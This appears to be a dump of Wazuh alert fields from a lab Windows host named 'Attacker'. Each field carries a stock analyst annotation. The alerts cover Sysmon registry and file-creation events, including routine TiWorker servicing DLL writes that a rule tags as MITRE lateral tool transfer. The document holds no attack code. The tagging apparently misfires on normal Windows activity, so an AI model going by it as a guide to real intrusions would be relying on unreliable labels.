data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:42:10.0067341Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 228512 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2025-04-20 01:42:10.004
ProcessGuid: {94294ddc-ea86-67fe-3b00-000000000e00}
ProcessId: 2892
Image: C:\WINDOWS\system32\svchost.exe
TargetObject: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{B5C681E4-1680-4090-A10F-6F4486F58558}
Details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\135.0.3179.85\msedgewebview2.exe|Name=Microsoft Edge (mDNS-In)|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge WebView2 Runtime|
User: NT AUTHORITY\LOCAL SERVICE" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.eventType: SetValue No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:42:10.004 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-ea86-67fe-3b00-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2892 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetObject: HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B5C681E4-1680-4090-A10F-6F4486F58558} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.85\\msedgewebview2.exe|Name=Microsoft Edge (mDNS-In)|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge WebView2 Runtime| No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\LOCAL SERVICE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: The VSS service is shutting down due to idle timeout. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60702 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534080.640385 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: VSS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 8224 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:33:29.5025140Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2399 Incremental log record number – handy for timeline order.
data.win.system.processID: 12680 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The VSS service is shutting down due to idle timeout. " No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.binary: 2D20436F64653A2020434F525356434330303030303737322D2043616C6C3A2020434F525356434330303030303735342D205049443A202030303031323638302D205449443A202030303030333530342D20434D443A2020433A5C57494E444F57535C73797374656D33325C76737376632E6578652020202D20557365723A204E616D653A204E5420415554484F524954595C53595354454D2C205349443A532D312D352D313820 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Listened ports status (netstat) changed (new port opened or closed). Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 533 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['ossec'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.2.7', '10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['10.1'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.14', 'AU.6'] NIST 800‑53 mapping – US Fed controls.
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.643528 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.0312732Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260578 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.030
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\CbsCore.dll
CreationUtcTime: 2025-04-20 01:55:28.030
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.030 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\CbsCore.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.030 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.646493 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.0468118Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260579 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.045
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\CbsMsg.dll
CreationUtcTime: 2025-04-20 01:55:28.045
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.045 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\CbsMsg.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.045 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 10 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.649454 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.1180755Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260590 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.116
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\ReserveManager.dll
CreationUtcTime: 2025-04-20 01:55:28.116
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.116 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\ReserveManager.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.116 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 11 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.652447 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.0635120Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260582 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.062
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\dpx.dll
CreationUtcTime: 2025-04-20 01:55:28.062
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.062 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\dpx.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.062 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 12 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.655396 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.1367565Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260595 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.135
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\turbocontainer.dll
CreationUtcTime: 2025-04-20 01:55:28.135
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.135 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\turbocontainer.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.135 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 13 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.658389 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
